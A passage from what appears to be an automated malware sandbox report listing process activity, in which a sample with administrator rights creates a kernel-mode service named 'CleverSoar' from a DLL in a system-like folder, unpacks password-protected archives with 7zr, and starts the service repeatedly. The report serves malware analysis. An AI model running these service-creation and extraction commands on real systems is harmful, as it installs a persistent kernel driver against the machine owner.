                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:9
                                                        Start time:01:52:54
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:10
                                                        Start time:01:52:54
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:11
                                                        Start time:01:52:54
                                                        Start date:23/12/2024
                                                        Path:C:\Program Files (x86)\Windows NT\7zr.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
                                                        Imagebase:0x820000
                                                        File size:831'200 bytes
                                                        MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Antivirus matches:
                                                        • Detection: 0%, ReversingLabs
                                                        • Detection: 0%, Virustotal, Browse
                                                        Has exited:true

                                                        Target ID:12
                                                        Start time:01:52:54
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:13
                                                        Start time:01:52:55
                                                        Start date:23/12/2024
                                                        Path:C:\Program Files (x86)\Windows NT\7zr.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
                                                        Imagebase:0x820000
                                                        File size:831'200 bytes
                                                        MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:14
                                                        Start time:01:52:55
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:15
                                                        Start time:01:52:55
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:16
                                                        Start time:01:52:55
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:17
                                                        Start time:01:52:55
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:18
                                                        Start time:01:52:55
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:19
                                                        Start time:01:52:55
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:20
                                                        Start time:01:52:55
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:21
                                                        Start time:01:52:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:22
                                                        Start time:01:52:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:23
                                                        Start time:01:52:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:24
                                                        Start time:01:52:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:25
                                                        Start time:01:52:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:26
                                                        Start time:01:52:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:27
                                                        Start time:01:52:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:28
                                                        Start time:01:52:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:29
                                                        Start time:01:52:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:30
                                                        Start time:01:52:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:31
                                                        Start time:01:52:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:32
                                                        Start time:01:52:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:33
                                                        Start time:01:52:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff6ee680000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:34
                                                        Start time:01:52:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:35
                                                        Start time:01:52:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:36
                                                        Start time:01:52:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:37
                                                        Start time:01:52:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:38
                                                        Start time:01:52:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:39
                                                        Start time:01:52:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:40
                                                        Start time:01:52:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:41
                                                        Start time:01:52:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:42
                                                        Start time:01:52:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:43
                                                        Start time:01:52:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:44
                                                        Start time:01:52:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:45
                                                        Start time:01:52:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:46
                                                        Start time:01:52:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:47
                                                        Start time:01:52:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:48
                                                        Start time:01:52:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:49
                                                        Start time:01:52:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:51
                                                        Start time:01:52:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:52
                                                        Start time:01:52:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:53
                                                        Start time:01:52:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:54
                                                        Start time:01:52:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:55
                                                        Start time:01:52:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:56
                                                        Start time:01:52:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:57
                                                        Start time:01:52:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:58
                                                        Start time:01:52:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:59
                                                        Start time:01:52:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:60
                                                        Start time:01:52:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:61
                                                        Start time:01:52:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:62
                                                        Start time:01:52:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:63
                                                        Start time:01:52:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:64
                                                        Start time:01:52:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:65
                                                        Start time:01:52:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:66
                                                        Start time:01:52:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:67
                                                        Start time:01:52:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:68
                                                        Start time:01:52:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:69
                                                        Start time:01:52:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:70
                                                        Start time:01:52:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
